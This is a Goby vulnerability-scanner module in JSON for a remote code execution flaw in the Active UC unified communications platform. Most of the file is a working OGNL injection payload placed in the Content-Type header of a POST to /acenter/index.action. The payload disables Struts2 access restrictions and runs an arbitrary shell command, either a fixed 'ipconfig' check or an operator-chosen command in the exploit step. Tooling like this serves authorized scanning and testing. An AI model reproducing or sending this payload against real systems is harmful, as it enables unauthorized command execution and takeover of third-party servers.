Goby/json/Active_UC_index.action_RCE.json

{
      "Name": "Active UC index.action RCE",
      "Level": "3",
      "Tags": [
            "RCE"
      ],
      "GobyQuery": "title=\"网动统一通信平台(Active UC)\"",
      "Description": "",
      "Product": "Active UC",
      "Homepage": "http://www.iactive.com.cn/",
      "Author": "",
      "Impact": "Active UC index.action has a RCE vulnerability.",
      "Recommendation": "update",
      "References": [],
      "HasExp": true,
      "ExpParams": [
            {
                  "Name": "cmd",
                  "Type": "input",
                  "Value": "whoami"
            }
      ],
      "ExpTips": {
            "Type": "",
            "Content": ""
      },
      "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "POST",
                        "uri": "/acenter/index.action",
                        "follow_redirect": false,
                        "header": {
                              "Accept-Encoding": "gzip, deflate",
                              "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
                              "Connection": "close",
                              "Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36",
                              "Charsert": "UTF-8",
                              "Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ipconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170",
                              "Cache-Control": "no-cache",
                              "Pragma": "no-cache"
                        },
                        "data_type": "text",
                        "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "Windows IP",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": []
            }
      ],
      "ExploitSteps": [
            "AND",
            {
                  "Request": {
                        "method": "POST",
                        "uri": "/acenter/index.action",
                        "follow_redirect": false,
                        "header": {
                              "Accept-Encoding": "gzip, deflate",
                              "Accept": "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",
                              "Connection": "close",
                              "Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36",
                              "Charsert": "UTF-8",
                              "Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170",
                              "Cache-Control": "no-cache",
                              "Pragma": "no-cache"
                        },
                        "data_type": "text",
                        "data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "Windows IP",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": [
                        "output|lastbody|undefined|undefined"
                  ]
            }
      ],
      "PostTime": "0000-00-00 00:00:00",
      "GobyVersion": "0.0.0"
}